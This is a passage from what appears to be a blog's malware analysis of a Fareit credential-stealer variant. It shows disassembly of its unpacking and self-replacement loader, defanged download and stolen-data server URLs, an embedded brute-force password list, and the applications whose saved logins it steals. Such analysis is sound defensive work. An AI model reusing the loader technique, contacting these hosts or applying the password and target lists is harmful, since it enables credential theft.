<br />
<br />
The executable begins by decrypting a couple of data, into newly allocated memory spaces, containing codes that dynamically imports API that it will use later. This initially results to these APIs:
<br />
<br />
<pre class="brush: asm">
CPU Dump
Address Value Comments
00240698 756A4BC6 ; kernel32.LoadLibraryA
0024069C 756A1225 ; kernel32.GetModuleHandleA
002406A0 756A1202 ; kernel32.GetProcAddress
002406A4 756A34EC ; kernel32.VirtualProtect
002406A8 756A1801 ; kernel32.VirtualAlloc
002406AC 756A183E ; kernel32.VirtualFree
002406B0 756A13D0 ; kernel32.CloseHandle
002406B4 756C9597 ; kernel32.CreateToolhelp32Snapshot
002406B8 756A14FA ; kernel32.GetModuleFileNameA
002406BC 756ACA6E ; kernel32.CreateFileA
002406C0 756A177B ; kernel32.SetFilePointer
002406C4 756A1856 ; kernel32.ReadFile
002406C8 756A11D8 ; kernel32.GetCurrentProcessId
002406CC 75725F19 ; kernel32.Module32First
002406D0 75726002 ; kernel32.Module32Next
002406D4 756A14DD ; kernel32.GetProcessHeap
002406D8 756A1126 ; kernel32.WaitForSingleObject
002406DC 779BDEC6 ; ntdll.RtlAllocateHeap
</pre>
<br />
<br />
While at it, notable bugs can be seen when attempting to import more APIs. Simple string decryption was incomplete.
<br />
<br />
<pre class="brush: asm">
seg000:0000005B pop edi
seg000:0000005C add edi, 0Dh
seg000:0000005F inc byte ptr [edi]
seg000:00000061 dec byte ptr [edi+1]
seg000:00000064 dec byte ptr [edi+2]
seg000:00000067 dec byte ptr [edi+4]
seg000:0000006A push edi ; result: HeapAlloc
seg000:0000006B push ebx
seg000:0000006C call dword ptr [ebp+8] ; GetProcAddress
seg000:0000006F mov [esi], eax
seg000:00000071 add edi, 0Ah
seg000:00000074 dec byte ptr [edi] ; byte decrypt
seg000:00000076 inc byte ptr [edi+1]
seg000:00000079 dec byte ptr [edi+2]
seg000:0000007C inc byte ptr [edi+3]
seg000:0000007F dec byte ptr [edi+4]
seg000:00000082 dec byte ptr [edi+5]
seg000:00000085 neg byte ptr [edi+6] ; BUG here
seg000:00000088 not byte ptr [edi+7]
seg000:0000008B push edi ; result: "HeapFrfe"
seg000:0000008C push ebx
seg000:0000008D call dword ptr [ebp+8] ; GetProcAddress
seg000:00000090 mov [esi+4], eax
seg000:00000093 add edi, 9
seg000:00000096 not byte ptr [edi] ; BUG here
seg000:00000098 not byte ptr [edi+1]
seg000:0000009B not byte ptr [edi+2]
seg000:0000009E dec byte ptr [edi+8]
seg000:000000A1 push edi ; result: FetTickCmunt
seg000:000000A2 push ebx
seg000:000000A3 call dword ptr [ebp+8] ; GetProcAddress
</pre>
<br />
<br />
Next, embedded into the file is an encrypted PE file with a size of 0x16e00 (93,696) bytes. Allocates memory space with the said size and decrypts there.
<br />
<br />
<pre class="brush: asm">
seg000:0000065A push 4
seg000:0000065C push 1000h
seg000:00000661 push edi ; size = 16e00 (93696 bytes)
seg000:00000662 push 0
seg000:00000664 call dword ptr [ebp+10h] ; VirtualAlloc
seg000:00000667 mov esi, eax
seg000:00000669 sub esp, 104h
seg000:0000066F mov edi, esp
seg000:00000671 push 104h
seg000:00000676 push edi
seg000:00000677 push ebx
seg000:00000678 call dword ptr [ebp+20h] ; GetModuleFileName store to stack
seg000:0000067B push 0
seg000:0000067D push 80h
seg000:00000682 push 3
seg000:00000684 push 0
seg000:00000686 push 1
seg000:00000688 push 80000000h
seg000:0000068D push edi
seg000:0000068E call dword ptr [ebp+24h] ; CreateFileA - opens our file GENERIC_READ
seg000:00000691 add esp, 104h
seg000:000000EA mov edi, eax
seg000:000000EC push 0
seg000:000000EE push 0
seg000:000000F0 push dword ptr [ebp+6Ch]
seg000:000000F3 push edi
seg000:000000F4 call dword ptr [ebp+28h] ; SetFilePointer - start of encrypted dump 0x46ec file offset
seg000:000000F7 mov ecx, [ebp+70h]
seg000:000000FA push 0
seg000:000000FC push esp
seg000:000000FD pop eax
seg000:000000FE push dword ptr [esp]
seg000:00000101 push eax
seg000:00000102 push ecx
seg000:00000103 push esi
seg000:00000104 push edi
seg000:00000105 call dword ptr [ebp+2Ch] ; ReadFile size=16e00
seg000:00000108 pop eax
seg000:00000109 push edi
seg000:0000010A call dword ptr [ebp+18h] ; CloseHandle
seg000:0000010D call decryptAPEFile
</pre>
<br />
<br />
Then replaces the whole running process with this new PE file by copying data section by section:
<br />
1. Use VirtualProtect API to replace memory protection with WRITE access.
<br />
2. Copy binary codes and data of the section based on the virtual size indicated in the PE section headers.
<br />
3. Restore the memory protection.
<br />
<br />
<pre class="brush: asm">
seg000:00000139 push eax
seg000:0000013A push esp
seg000:0000013B push 4
seg000:0000013D push edi
seg000:0000013E push ebx
seg000:0000013F call dword ptr [ebp+0Ch] ; VirtualProtect replace protection with write
seg000:00000142 push esp
seg000:00000143 push 2
seg000:00000145 push edi
seg000:00000146 push ebx
seg000:00000147 push esi
seg000:00000148 mov ecx, edi
seg000:0000014A mov edi, ebx
seg000:0000014C rep movsb ; replace first 512 bytes of running process with new PE
seg000:0000014E pop esi
seg000:0000014F call dword ptr [ebp+0Ch] ; VirtualProtect - replace rights with readonly
seg000:00000152 pop eax
seg000:00000153 mov ecx, esi
seg000:00000155 add ecx, [ecx+3Ch]
seg000:00000158 lea edi, [ecx+18h]
seg000:0000015B mov edx, [edi+20h]
seg000:0000015E movzx eax, word ptr [ecx+14h]
seg000:00000162 add edi, eax
seg000:00000164 movzx ecx, word ptr [ecx+6]
seg000:00000168 loc_168:
seg000:00000168 pusha ; section
seg000:00000169 mov eax, [edi+14h]
seg000:0000016C test eax, eax
seg000:0000016E jz short loc_1B1
seg000:00000170 mov eax, [edi+8]
seg000:00000173 test eax, eax
seg000:00000175 jz short loc_1B1
seg000:00000177 call sizealign
seg000:0000017C mov ecx, eax
seg000:0000017E mov eax, [edi+24h]
seg000:00000181 call sub_42A
seg000:00000186 add esi, [edi+14h]
seg000:00000189 push dword ptr [edi+10h]
seg000:0000018C mov edi, [edi+0Ch]
seg000:0000018F add edi, ebx
seg000:00000191 pop ebx
seg000:00000192 push eax
seg000:00000193 mov edx, esp
seg000:00000195 push edx
seg000:00000196 push eax
seg000:00000197 push ecx
seg000:00000198 push edi
seg000:00000199 push ecx
seg000:0000019A push edx
seg000:0000019B push 4
seg000:0000019D push ecx
seg000:0000019E push edi
seg000:0000019F call dword ptr [ebp+0Ch] ; VirtualProtect for write
seg000:000001A2 pop ecx
seg000:000001A3 xor eax, eax
seg000:000001A5 push edi
seg000:000001A6 rep stosb
seg000:000001A8 pop edi
seg000:000001A9 mov ecx, ebx
seg000:000001AB rep movsb ; copy data
seg000:000001AD call dword ptr [ebp+0Ch] ; VirtualProtect for read only
seg000:000001B0 pop eax
seg000:000001B1 loc_1B1:
seg000:000001B1 popa
seg000:000001B2 add edi, 28h ; '('
seg000:000001B5 loop loc_168 ; rerun to all sections
</pre>
<br />
<br />
Then dynamically imports the APIs indicated in the new PE's import section table and results to these APIs:
<br />
<br />
<pre class="brush: text">
CPU Dump
Address Value Comments
0041828C 756ACA6E ; kernel32.CreateFileA
00418290 756A1856 ; kernel32.ReadFile
00418294 756A13D0 ; kernel32.CloseHandle
00418298 756A1262 ; kernel32.WriteFile
0041829C 756B9A09 ; kernel32.lstrlenA
004182A0 756BA337 ; kernel32.GlobalLock
004182A4 756BA272 ; kernel32.GlobalUnlock
004182A8 756A4114 ; kernel32.LocalFree
004182AC 756A1A39 ; kernel32.LocalAlloc
004182B0 756A10FC ; kernel32.GetTickCount
004182B4 756C28B1 ; kernel32.lstrcpy
004182B8 756C2951 ; kernel32.lstrcat
004182BC 756ACABC ; kernel32.GetFileAttributesA
004182C0 756BDC78 ; kernel32.ExpandEnvironmentStringsA
004182C4 756A1AE2 ; kernel32.GetFileSize
004182C8 756ABDC0 ; kernel32.CreateFileMappingA
004182CC 756A1A75 ; kernel32.MapViewOfFile
004182D0 756A156F ; kernel32.UnmapViewOfFile
004182D4 756A4BC6 ; kernel32.LoadLibraryA
004182D8 756A1202 ; kernel32.GetProcAddress
004182DC 756C2B74 ; kernel32.GetTempPathA
004182E0 756C2909 ; kernel32.CreateDirectoryA
004182E4 756ACAEC ; kernel32.DeleteFileA
004182E8 756A1568 ; kernel32.GetCurrentProcess
004182EC 756A16B3 ; kernel32.WideCharToMultiByte
004182F0 756A11B0 ; kernel32.GetLastError
004182F4 756BDC90 ; kernel32.lstrcmp
004182F8 756C9597 ; kernel32.CreateToolhelp32Snapshot
004182FC 756C778B ; kernel32.Process32First
00418300 756A1B12 ; kernel32.OpenProcess
00418304 756C7549 ; kernel32.Process32Next
00418308 756ADDDC ; kernel32.FindFirstFileA
0041830C 756B99B3 ; kernel32.lstrcmpi
00418310 756C2921 ; kernel32.FindNextFileA
00418314 756A32CD ; kernel32.FindClose
00418318 756A1225 ; kernel32.GetModuleHandleA
0041831C 756A1EDC ; kernel32.GetVersionExA
00418320 756BD889 ; kernel32.GetLocaleInfoA
00418324 756A4D3F ; kernel32.GetSystemInfo
00418328 756C29CF ; kernel32.GetWindowsDirectoryA
0041832C 756AE6A7 ; kernel32.GetPrivateProfileStringA
00418330 756B9562 ; kernel32.SetCurrentDirectoryA
00418334 7571A3B1 ; kernel32.GetPrivateProfileSectionNamesA
00418338 756CBF8B ; kernel32.GetPrivateProfileIntA
0041833C 756CC45E ; kernel32.GetCurrentDirectoryA
00418340 756A16A6 ; kernel32.lstrlenW
00418344 756A1AA5 ; kernel32.MultiByteToWideChar
00418348 756A10EF ; kernel32.Sleep
0041834C 756A14FA ; kernel32.GetModuleFileNameA
00418350 756CB4FB ; kernel32.LCMapStringA
00418354 756A734E ; kernel32.ExitProcess
00418358 756AD03C ; kernel32.SetUnhandledExceptionFilter
00418360 762A2404 ; ole32.CreateStreamOnHGlobal
00418364 762A3ECA ; ole32.GetHGlobalFromStream
00418368 762C10DD ; ole32.CoCreateGuid
0041836C 762D4003 ; ole32.CoTaskMemFree
00418370 762D57FC ; ole32.CoCreateInstance
00418374 7629EF0B ; ole32.OleInitialize
0041837C 75FAAF26 ; USER32.wsprintfA
00418384 7746BC0D ; ADVAPI32.RegOpenKeyExA
00418388 7746BC25 ; ADVAPI32.RegQueryValueExA
0041838C 7746BED4 ; ADVAPI32.RegCloseKey
00418390 7745D2ED ; ADVAPI32.RegOpenKeyA
00418394 77461B89 ; ADVAPI32.RegEnumKeyExA
00418398 7745D3C1 ; ADVAPI32.RegCreateKeyA
0041839C 77461B96 ; ADVAPI32.RegSetValueExA
004183A0 7746BEE4 ; ADVAPI32.IsTextUnicode
004183A4 77462EBA ; ADVAPI32.RegOpenCurrentUser
004183A8 7745D539 ; ADVAPI32.RegEnumValueA
004183AC 7745E504 ; ADVAPI32.GetUserNameA
004183B4 766A9BA5 ; shell32.ShellExecuteA
004183BC 76090EA5 ; wininet.InternetCrackUrlA
004183C0 7609B636 ; wininet.InternetCreateUrlA
004183C8 75E5DAFE ; SHLWAPI.StrStrIA
004183CC 75E8C64B ; SHLWAPI.StrRChrIA
004183D0 75E5BF27 ; SHLWAPI.StrToIntA
004183D4 75E5CDB6 ; SHLWAPI.StrStrA
004183D8 75E5DB5A ; SHLWAPI.StrCmpNIA
004183DC 75E649E1 ; SHLWAPI.StrStrIW
004183E4 770DE846 ; urlmon.ObtainUserAgentString
004183EC 75563234 ; WS2_32.inet_addr
004183F0 75577133 ; WS2_32.gethostbyname
004183F4 75563F00 ; WS2_32.socket
004183F8 755648BE ; WS2_32.connect
004183FC 75563BED ; WS2_32.closesocket
00418400 7556C4C8 ; WS2_32.send
00418404 75564981 ; WS2_32.select
00418408 719F17A8 ; wsock32.recv
0041840C 719F18E0 ; wsock32.setsockopt
00418410 7556C0FB ; WS2_32.WSAStartup
00418418 7389D1F9 ; userenv.LoadUserProfileA
0041841C 73893F0D ; userenv.UnloadUserProfile
</pre>
<br />
<br />
Since the running process has been replaced by a new PE files, some information in its Process Environment Block should be changed such as the entry point and the image base.
<br />
<br />
<pre class="brush: asm">
seg000:000001D4 push dword ptr fs:30h
seg000:000001DB pop eax
seg000:000001DC mov eax, [eax+0Ch]
seg000:000001DF mov eax, [eax+0Ch]
seg000:000001E2 loc_1E2:
seg000:000001E2 cmp [eax+18h], ebx
seg000:000001E5 jz short loc_1EB
seg000:000001E7 mov eax, [eax]
seg000:000001E9 jmp short loc_1E2
seg000:000001EB loc_1EB:
seg000:000001EB mov ecx, [esp]
seg000:000001EE add ecx, [ecx+3Ch]
seg000:000001F1 mov esi, [ecx+28h]
seg000:000001F4 add esi, edi
seg000:000001F6 mov [eax+18h], edi
seg000:000001F9 mov [eax+1Ch], esi
seg000:000001FC test word ptr [ecx+16h], 2000h
seg000:00000202 jnz short loc_210
seg000:00000204 mov eax, dword ptr fs:18h
seg000:0000020A mov eax, [eax+30h]
seg000:0000020D mov [eax+8], edi ; update entry point in PEB
</pre>
<br />
<br />
And then returns back to the modified process starting at the entry point.
<br />
<br />
<pre class="brush: asm">
seg000:0000021A mov [esp+1Ch], esi ; sets up at 0x1c where [esp] gets to be entry point
seg000:0000021E popa
seg000:0000021F push eax
seg000:00000220 call callnextline2
seg000:00000225 pop eax
seg000:00000226 cmp dword ptr [eax+64h], 200h
seg000:0000022D jnz short loc_23E
seg000:0000022F mov eax, [esp]
seg000:00000232 mov dword ptr [esp], 0
seg000:00000239 push dword ptr [esp+4]
seg000:0000023D push eax ; transfer control to new PE entry point
seg000:0000023E loc_23E:
seg000:0000023E xor eax, eax
seg000:00000240 retn
</pre>
<br />
<br />
<b>Still Fareit</b>
<br />
A simple binary comparison shows that this is a Fareit variant almost similar to that of <a href="http://thecyberdung.blogspot.com/2013/02/developing-fareit-still-steals-your.html">http://thecyberdung.blogspot.com/2013/02/developing-fareit-still-steals-your.html</a>. Here are some of the highlighted differences:
<br />
* Malware download sites (can be updates of its variant):
<br />
<br />
<pre class="brush: asm">
.data:004140CD aHttpMissionsea db 'h00p://Missionsearchjobs.com/D5F7G.exe',0
.data:004140F4 aHttpBetterback db 'h00p://betterbacksystems.com/kvq.exe',0
.data:00414119 aHttpWww_printd db 'h00p://www.printdirectadvertising.com/vfMJH.exe',0
.data:00414149 aHttpS381195155 db 'h00p://S381195155.onlinehome.us/vmkCQg8N.exe',0
</pre>
At the time of this writing, h00p://Missionsearchjobs.com/D5F7G.exe and h00p://S381195155.onlinehome.us/vmkCQg8N.exe were the only ones up and are both the same file with this MD5 060260f668ce9f0b6d8c75c2893f3796.
<br />
<br />
* Servers it sends stolen information to and receives updates from
<br />
<br />
<pre class="brush: asm">
.data:0041400C aHttpGuterprote db 'h00p://guterprotectionperfection.com/ponyb/gate.php',0
.data:00414040 aHttpGuterprova db 'h00p://guterprova.com/ponyb/gate.php',0
.data:00414065 aHttpGutterglov db 'h00p://gutterglovegutterprotection.com/ponyb/gate.php',0
.data:0041409B aHttpGutterguar db 'h00p://gutterguardbuyersguide.com/ponyb/gate.php',0
</pre>
<br />
<br />
* The passwords list it used to brute
<br />
<br />
<pre class="brush: asm">
.data:00416D79 aDiamond db 'diamond',0
.data:00416D81 aHope db 'hope',0
.data:00416D86 aMaggie db 'maggie',0
.data:00416D8D aMaverick db 'maverick',0
.data:00416D96 aOnline db 'online',0
.data:00416D9D aSpirit db 'spirit',0
.data:00416DA4 aGeorge db 'george',0
.data:00416DAB aFriends db 'friends',0
.data:00416DB3 aDallas db 'dallas',0
.data:00416DBA aAdidas db 'adidas',0
.data:00416DC1 a1q2w3e db '1q2w3e',0
.data:00416DC8 a7777 db '7777',0
.data:00416DCD aOrange db 'orange',0
.data:00416DD4 aTesttest db 'testtest',0
.data:00416DDD aAsshole db 'asshole',0
.data:00416DE5 aApple db 'apple',0
.data:00416DEB aBiteme db 'biteme',0
.data:00416DF2 a666666 db '666666',0
.data:00416DF9 aWilliam db 'william',0
.data:00416E01 aMickey db 'mickey',0
.data:00416E08 aAsdfgh db 'asdfgh',0
.data:00416E0F aWisdom db 'wisdom',0
.data:00416E16 aBatman db 'batman',0
.data:00416E1D aMichelle db 'michelle',0
.data:00416E26 aDavid db 'david',0
.data:00416E2C aEminem db 'eminem',0
.data:00416E33 aScooter db 'scooter',0
.data:00416E3B aAsdfasdf db 'asdfasdf',0
.data:00416E44 aSammy db 'sammy',0
.data:00416E4A aBaby db 'baby',0
.data:00416E4F aSamantha db 'samantha',0
.data:00416E58 aMaxwell db 'maxwell',0
.data:00416E60 a55555 db '55555',0
.data:00416E66 aJustin db 'justin',0
.data:00416E6D aJames db 'james',0
.data:00416E73 aChicken db 'chicken',0
.data:00416E7B aDanielle db 'danielle',0
.data:00416E84 aIloveyou2 db 'iloveyou2',0
.data:00416E8E aFuckoff db 'fuckoff',0
.data:00416E96 aPrince db 'prince',0
.data:00416E9D aJunior db 'junior',0
.data:00416EA4 aRainbow db 'rainbow',0
.data:00416EAC a112233 db '112233',0
.data:00416EB3 aFuckyou1 db 'fuckyou1',0
.data:00416EBC a1 db '1',0
.data:00416EBE aNintendo db 'nintendo',0
.data:00416EC7 aPeanut db 'peanut',0
.data:00416ECE aNone db 'none',0
.data:00416ED3 aChurch db 'church',0
.data:00416EDA aBubbles db 'bubbles',0
.data:00416EE2 aRobert db 'robert',0
.data:00416EE9 a222222 db '222222',0
.data:00416EF0 aDestiny db 'destiny',0
.data:00416EF8 aLoving db 'loving',0
.data:00416EFF aGfhjkm db 'gfhjkm',0
.data:00416F06 aMylove db 'mylove',0
.data:00416F0D aJasper db 'jasper',0
.data:00416F14 aHallo db 'hallo',0
.data:00416F1A a123321 db '123321',0
.data:00416F21 aCocacola db 'cocacola',0
.data:00416F2A aHelpme db 'helpme',0
.data:00416F31 aNicole db 'nicole',0
.data:00416F38 aGuitar db 'guitar',0
.data:00416F3F aBillgates db 'billgates',0
.data:00416F49 aLooking db 'looking',0
.data:00416F51 aScooby db 'scooby',0
.data:00416F58 aJoseph db 'joseph',0
.data:00416F5F aGenesis db 'genesis',0
.data:00416F67 aForum db 'forum',0
.data:00416F6D aEmmanuel db 'emmanuel',0
.data:00416F76 aCassie db 'cassie',0
.data:00416F7D aVictory db 'victory',0
.data:00416F85 aPassw0rd db 'passw0rd',0
.data:00416F8E aFoobar db 'foobar',0
.data:00416F95 aIlovegod db 'ilovegod',0
.data:00416F9E aNathan db 'nathan',0
.data:00416FA5 aBlabla db 'blabla',0
.data:00416FAC aDigital db 'digital',0
.data:00416FB4 aPeaches db 'peaches',0
.data:00416FBC aFootball1 db 'football1',0
.data:00416FC6 a11111111 db '11111111',0
.data:00416FCF aPower db 'power',0
.data:00416FD5 aThunder db 'thunder',0
.data:00416FDD aGateway db 'gateway',0
.data:00416FE5 aIloveyou db 'iloveyou!',0
.data:00416FEF aFootball db 'football',0
.data:00416FF8 aTigger db 'tigger',0
.data:00416FFF aCorvette db 'corvette',0
.data:00417008 aAngel db 'angel',0
.data:0041700E aKiller db 'killer',0
.data:00417015 aCreative db 'creative',0
.data:0041701E a123456789 db '123456789',0
.data:00417028 aGoogle db 'google',0
.data:0041702F aZxcvbnm db 'zxcvbnm',0
.data:00417037 aStartrek db 'startrek',0
.data:00417040 aAshley db 'ashley',0
.data:00417047 aCheese db 'cheese',0
.data:0041704E aA db 'a',0
.data:00417050 aSunshine db 'sunshine',0
.data:00417059 aChrist db 'christ',0
.data:00417060 a000000 db '000000',0
.data:00417067 aSoccer db 'soccer',0
.data:0041706E aQwerty1 db 'qwerty1',0
.data:00417076 aFriend db 'friend',0
.data:0041707D aSummer db 'summer',0
.data:00417084 a1234567 db '1234567',0
.data:0041708C aMerlin db 'merlin',0
.data:00417093 aPhpbb db 'phpbb',0
.data:00417099 a12345678 db '12345678',0
.data:004170A2 aJordan db 'jordan',0
.data:004170A9 aSaved db 'saved',0
.data:004170AF aDexter db 'dexter',0
.data:004170B6 aViper db 'viper',0
.data:004170BC aWinner db 'winner',0
.data:004170C3 aSparky db 'sparky',0
.data:004170CA aWindows db 'windows',0
.data:004170D2 a123abc db '123abc',0
.data:004170D9 aLucky db 'lucky',0
.data:004170DF aAnthony db 'anthony',0
.data:004170E7 aJesus db 'jesus',0
.data:004170ED aGhbdtn db 'ghbdtn',0
.data:004170F4 aAdmin db 'admin',0
.data:004170FA aHotdog db 'hotdog',0
.data:00417101 aBaseball db 'baseball',0
.data:0041710A aPassword1 db 'password1',0
.data:00417114 aDragon db 'dragon',0
.data:0041711B aTrustno1 db 'trustno1',0
.data:00417124 aJason db 'jason',0
.data:0041712A aInternet db 'internet',0
.data:00417133 aMustdie db 'mustdie',0
.data:0041713B aJohn db 'john',0
.data:00417140 aLetmein db 'letmein',0
.data:00417148 a123 db '123',0
.data:0041714C aMike db 'mike',0
.data:00417151 aKnight db 'knight',0
.data:00417158 aJordan23 db 'jordan23',0
.data:00417161 aAbc123 db 'abc123',0
.data:00417168 aRed123 db 'red123',0
.data:0041716F aPraise db 'praise',0
.data:00417176 aFreedom db 'freedom',0
.data:0041717E aJesus1 db 'jesus1',0
.data:00417185 a12345 db '12345',0
.data:0041718B aLondon db 'london',0
.data:00417192 aComputer db 'computer',0
.data:0041719B aMicrosoft db 'microsoft',0
.data:004171A5 aMuffin db 'muffin',0
.data:004171AC aQwert db 'qwert',0
.data:004171B2 aMother db 'mother',0
.data:004171B9 aMaster db 'master',0
.data:004171C0 a111111 db '111111',0
.data:004171C7 aQazwsx db 'qazwsx',0
.data:004171CE aSamuel db 'samuel',0
.data:004171D5 aCanada db 'canada',0
.data:004171DC aSlayer db 'slayer',0
.data:004171E3 aRachel db 'rachel',0
.data:004171EA aOnelove db 'onelove',0
.data:004171F2 aQwerty db 'qwerty',0
.data:004171F9 aPrayer db 'prayer',0
.data:00417200 aIloveyou1 db 'iloveyou1',0
.data:0041720A aWhatever db 'whatever',0
.data:00417213 aGod db 'god',0
.data:00417217 aPassword_1 db 'password',0
.data:00417220 aBlessing db 'blessing',0
.data:00417229 aSnoopy db 'snoopy',0
.data:00417230 a1q2w3e4r db '1q2w3e4r',0
.data:00417239 aCookie db 'cookie',0
.data:00417240 a11111 db '11111',0
.data:00417246 aChelsea db 'chelsea',0
.data:0041724E aPokemon db 'pokemon',0
.data:00417256 aHahaha db 'hahaha',0
.data:0041725D aAaaaaa db 'aaaaaa',0
.data:00417264 aHardcore db 'hardcore',0
.data:0041726D aShadow db 'shadow',0
.data:00417274 aWelcome db 'welcome',0
.data:0041727C aMustang db 'mustang',0
.data:00417284 a654321 db '654321',0
.data:0041728B aBailey db 'bailey',0
.data:00417292 aBlahblah db 'blahblah',0
.data:0041729B aMatrix db 'matrix',0
.data:004172A2 aJessica db 'jessica',0
.data:004172AA aStella db 'stella',0
.data:004172B1 aBenjamin db 'benjamin',0
.data:004172BA aTesting db 'testing',0
.data:004172C2 aSecret db 'secret',0
.data:004172C9 aTrinity db 'trinity',0
.data:004172D1 aRichard db 'richard',0
.data:004172D9 aPeace db 'peace',0
.data:004172DF aShalom db 'shalom',0
.data:004172E6 aMonkey db 'monkey',0
.data:004172ED aIloveyou_0 db 'iloveyou',0
.data:004172F6 aThomas db 'thomas',0
.data:004172FD aBlink182 db 'blink182',0
.data:00417306 aJasmine db 'jasmine',0
.data:0041730E aPurple db 'purple',0
.data:00417315 aTest db 'test',0
.data:0041731A aAngels db 'angels',0
.data:00417321 aGrace db 'grace',0
.data:00417327 aHello db 'hello',0
.data:0041732D aPoop db 'poop',0
.data:00417332 aBlessed db 'blessed',0
.data:0041733A a1234567890 db '1234567890',0
.data:00417345 aHeaven db 'heaven',0
.data:0041734C aHunter db 'hunter',0
.data:00417353 aPepper db 'pepper',0
.data:0041735A aJohn316 db 'john316',0
.data:00417362 aCool db 'cool',0
.data:00417367 aBuster db 'buster',0
.data:0041736E aAndrew db 'andrew',0
.data:00417375 aFaith db 'faith',0
.data:0041737B aGinger db 'ginger',0
.data:00417382 a7777777 db '7777777',0
.data:0041738A aHockey db 'hockey',0
.data:00417391 aHello1 db 'hello1',0
.data:00417398 aAngel1 db 'angel1',0
.data:0041739F aSuperman db 'superman',0
.data:004173A8 aEnter db 'enter',0
.data:004173AE aDaniel db 'daniel',0
.data:004173B5 a123123 db '123123',0
.data:004173BC aForever db 'forever',0
.data:004173C4 aNothing db 'nothing',0
.data:004173CC aDakota db 'dakota',0
.data:004173D3 aKitten db 'kitten',0
.data:004173DA aAsdf db 'asdf',0
.data:004173DF a1111 db '1111',0
.data:004173E4 aBanana db 'banana',0
.data:004173EB aGates db 'gates',0
.data:004173F1 aFlower db 'flower',0
.data:004173F8 aTaylor db 'taylor',0
.data:004173FF aLovely db 'lovely',0
.data:00417406 aHannah db 'hannah',0
.data:0041740D aPrincess db 'princess',0
.data:00417416 aCompaq db 'compaq',0
.data:0041741D aJennifer db 'jennifer',0
.data:00417426 aMyspace1 db 'myspace1',0
.data:0041742F aSmokey db 'smokey',0
.data:00417436 aMatthew db 'matthew',0
.data:0041743E aHarley db 'harley',0
.data:00417445 aRotimi db 'rotimi',0
.data:0041744C aFuckyou db 'fuckyou',0
.data:00417454 aSoccer1 db 'soccer1',0
.data:0041745C a123456 db '123456',0
.data:00417463 aSingle db 'single',0
.data:0041746A aJoshua db 'joshua',0
.data:00417471 aGreen db 'green',0
.data:00417477 a123qwe db '123qwe',0
.data:0041747E aStarwars db 'starwars',0
.data:00417487 aLove db 'love',0
.data:0041748C aSilver db 'silver',0
.data:00417493 aAustin db 'austin',0
.data:0041749A aMichael db 'michael',0
.data:004174A2 aAmanda db 'amanda',0
.data:004174A9 a1234 db '1234',0
.data:004174AE aCharlie db 'charlie',0
.data:004174B6 aBandit db 'bandit',0
.data:004174BD aChris db 'chris',0
.data:004174C3 aHappy db 'happy',0
.data:004174C9 aPass_0 db 'pass',0
</pre>
<br />
<br />
* What does it steal?
<br />
<br />
Similar to the previous variants, it steals stored credentials from different applications, and most of it FTP clients. After further web search, found out this NoPaste item, dated April 21, 2013, titled <b>; Password recovery modules</b> at <a href="http://nopaste.me/paste/164967415851741239b4ee8">http://nopaste.me/paste/164967415851741239b4ee8</a>. Seems to be the source code module, in assembly language, that gathers stored credentials. The user who pasted this is not specified. The module's source is quite descriptive with these target applications:
<br />
<ul>
<li>Common System Information</li>
<li>FAR/FAR2/FAR3 built-in ftp client</li>
<li>Windows/Total Commander built-in ftp client</li>
<li>Ipswitch WS_FTP client</li>
<li>CuteFTP</li>
<li>FlashFXP</li>
<li>FileZilla</li>
<li>FTP Commander</li>
<li>BulletProof FTP</li>
<li>SmartFTP 2.x-4.x</li>
<li>TurboFTP</li>
<li>FFFTP</li>
<li>CoffeeCupFTP</li>
<li>CoreFTP</li>
<li>FTP Explorer</li>
<li>Frigate3 FTP</li>
<li>SecureFX 6.6</li>
<li>UltraFXP 1.7</li>
<li>FTPRush 2.1.4, 2.1.5</li>
<li>WebSitePublisher 2.1.5</li>
<li>BitKinex 3.2.3</li>
<li>ExpanDrive 1.8.4</li>
<li>ClassicFTP 2.14</li>
<li>Fling 2.23</li>
<li>SoftX 3.3</li>
<li>Directory Opus 9.5.6.0.3937 (64-bit)</li>
<li>CoffeeCup FreeFTP 4.3 / DirectFTP</li>
<li>LeapFTP 2.6.2.470, 3.1.0.50</li>
<li>WinSCP 4.3.2 (Build 1201)</li>
<li>32bit FTP 11.07.01</li>
<li>NetDrive 1.2.0.4</li>
<li>WebDrive 9.16 (build 2385) 64-bit</li>
<li>FTP Control 4.5.0.0</li>
<li>Opera 6.x - 11.x</li>
<li>WiseFTP 1.x - 7.x</li>
<li>FTP Voyager 11.x-15.x</li>
<li>Mozilla Firefox 0.x-5.x</li>
<li>Mozilla Firefox FireFTP addon</li>
<li>Mozilla SeaMonkey 1.x-2.x</li>
<li>Mozilla Flock 1.x-2.x</li>
<li>Mozilla Suite Browser 1.x</li>
<li>LeechFTP 1.3</li>
<li>Odin Secure FTP Expert</li>
<li>WinFTP</li>
<li>FTP Surfer 1.0.7</li>
<li>FTPGetter 3</li>
<li>ALFTP 5</li>
<li>IE 4-9</li>
<li>Dreamweaver CS5</li>
<li>DeluxeFTP 6</li>
<li>Google Chrome</li>
<li>Chromium & SRWare Iron</li>
<li>ChromePlus</li>
<li>Bromium (Yandex Chrome)</li>
<li>Nichrome</li>
<li>Comodo Dragon</li>
<li>RockMelt</li>
<li>K-Meleon</li>
<li>Epic</li>
<li>StaffFTP</li>
<li>AceFTP 3</li>
<li>Global Downloader</li>
<li>FreshFTP</li>
<li>BlazeFTP</li>
<li>NetFile</li>
<li>GoFTP</li>
<li>3D-FTP</li>
<li>EasyFTP</li>
<li>XFTP</li>
<li>RDP (Windows Remote Desktop Connections)</li>
<li>FTP Now</li>
<li>Robo-FTP</li>
<li>Certificate Grabber</li>
<li>LinasFTP</li>
<li>Cyberduck</li>
<li>Putty (Russian version)</li>
<li>Notepad++ (NppFTP plugin)</li>
<li>CoffeeCup Visual Site Designer</li>
<li>FTPShell</li>
<li>FTPInfo</li>
<li>NexusFile</li>
<li>FastStone Browser</li>
<li>CoolNovo</li>
<li>WinZip (built-in FTP backup settings)</li>
<li>Yandex.Internet</li>
<li>MyFTP</li>
<li>sherrod FTP</li>
<li>NovaFTP</li>
<li>Common Windows Mail decryption code</li>
<li>Windows Live Mail</li>
<li>Windows Mail</li>
<li>Becky!</li>
<li>Pocomail</li>
<li>IncrediMail</li>
<li>The Bat!</li>
<li>Outlook</li>
<li>Thunderbird</li>
<li>FastTrackFTP</li>
</ul>
<br />
<br />
Fareit has been around, as I recall 2 years now probably stealing the same stored credentials. And now targeting clients of Bank of America using the same old technique, Social Engineering. Hopefully, authors of these applications make modifications to securely store user's credentials.
<br />
Fareit gets behind scanners by shape shifting its looks for every variant. Using different techniques, like code obfuscation and encryption, to cover the real code beneath.
<br />
<br />Unknownnoreply@blogger.com1